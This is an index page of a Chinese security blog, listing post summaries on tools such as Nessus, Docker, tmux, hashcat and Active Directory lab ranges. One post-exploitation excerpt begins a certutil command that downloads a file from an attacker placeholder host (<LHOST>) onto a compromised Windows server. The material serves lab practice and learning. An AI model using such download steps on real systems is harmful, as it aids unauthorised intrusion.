banner
lca

lca

真正的不自由,是在自己的心中设下牢笼。

工具

cover
cover

windows&mac安装nessus扫描器

mac 上使用 docker 安装 项目地址:https://github.com/elliot-bia/nessus 安装 Copy docker run -itd --name=ramisec_nessus -p 8834:8834 ramisec/nessus 更新参考gi…
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover

game of active directory(GOAD) part 2 查找用户

GOAD第二部分的内容主要包括查找用户名及爆破些密码。
cover
cover
cover
cover
cover

被封后如何拉取docker镜像

国内 docker 源被下架后,局域网要拉取镜像如果不走代理真的拉不下来,自己搭建的 ctfd 平台需要从 dockerhub 上拉取镜像,所以就需要设置下代理。 环境: 局域网内的 ubuntu 主机需要 docker 拉取镜像,不是本机 本机 ip:192.168.10…
cover
cover
cover
cover
cover
cover
cover

mac arm版安卓app抓包环境设置

mumu 模拟器下载后,先进行如下设置 mumu 模拟器版本 1.4.11 开启可写系统盘 开启 root 权限 安装 adb Copy brew install android-platform-tools 查看 adb 的连接端口 列出模拟器设备 Copy adb…
cover
cover
cover
cover

tmux使用记录

tmux是一个终端复用器类自由软件,功能类似GNU Screen,但使用ISC许可证发布。用户可以通过tmux 在一个终端内管理多个分离的会话,窗口及面板,对于同时使用多个命令行,或多个任务时非常方便。
cover
cover
cover
cover
cover
cover
cover

终端多路复用器screen工具使用记录

这是特别有用的工具,尤其是在需要长期运行进程或者在远程会话中保持会话不被断开的情况下。screen可以让开启的应用程序在后台运行。
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover

后渗透之文件传输及下载

拿到了服务器之后,就需要上传工具,或者从服务器下载文件,针对不同的场景(网络环境)可能需要用到不同的文件下载工具,平常打靶场也能用得到,这里就简单记录下。 windows Copy certutil -urlcache -split -f "http://<LHOST…
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover

春秋云镜靶场--Certify记录

Certify是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有4个flag,分布于不同的靶机。
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover

game of active directory(GOAD)域环境搭建

Game Of Active directory的第二个版本,项目地址:https://github.com/Orange-Cyberdefense/GOAD 域靶场环境通过 vagrang 安装 5 个 windows 实例(三个 DC,两个普通域内主机),拓朴图如下: 官…
cover

windows上安装marker

项目地址:https://github.com/VikParuchuri/marker 官方介绍说,Marker 将 PDF、EPUB 和 MOBI 转换为 markdown 文档,且比 nougat 快 10 倍。 官方只提供 linux 和 mac 的安装方式,参考在…
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover

mac如何抓微信小程序、公众号的http请求

为了复现几个微信小程序的漏洞通报,特意记录下如何使用 mac 抓小程序的请求。 工具: mac 最新版微信 Proxifier yakit 打开Proxifier,设置代理 1、先设置代理服务器 添加 yakit 监听的端口 8083 2、设置代理规则 点击 + 号…
cover

mac下设置多个java版本

mac下设置多个java版本,可以通过alias命令进行实现,不同的java版本设置不同的变量,后面通过alias引用。
cover
cover
cover
cover
cover
cover
cover
cover

建立一个docker私有仓库并提交镜像

最近搭建CTFd平台后,需要结合docker做动态flag靶场,所以就在本地另起一台机器,做成docker私有仓库,记录下过程。
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover

《从零开始学IDA逆向》学习笔记-9(函数逆向分析)

9.2 符号文件 目标文件:HOLA_REVERSER.exe 查看目标文件架构: 目标文件是 32 位程序,VC++ 2015 编译。 双击运行程序,提示输入数字 程序会判断输入的字符是否正确 9.3 定位 main 函数 先看下字符串 找到了目标程序运行时输出的一些…
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover

burpsuite使用的一些技巧

burpsuite使用的一些技巧(更新)
cover

几款常用的Google优质插件

汇总下平常使用比较多的google插件
cover

hvv信息收集要点

平常信息收集用到的一些工具及站点,持续更新!
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover

hashcat密码破解工具基础使用

hashcat是一款暴力破解、密码恢复工具,被称为 “世界上最快、最先进的密码恢复实用程序”,Hashcat 可与John the Ripper一较高下。它是破解哈希的首选渗透测试工具,并且 hashcat 支持多种猜测密码的蛮力攻击,包括字典和掩码攻击。 以前在测试的中…
此部落格數據所有權由區塊鏈加密技術和智能合約保障僅歸創作者所有。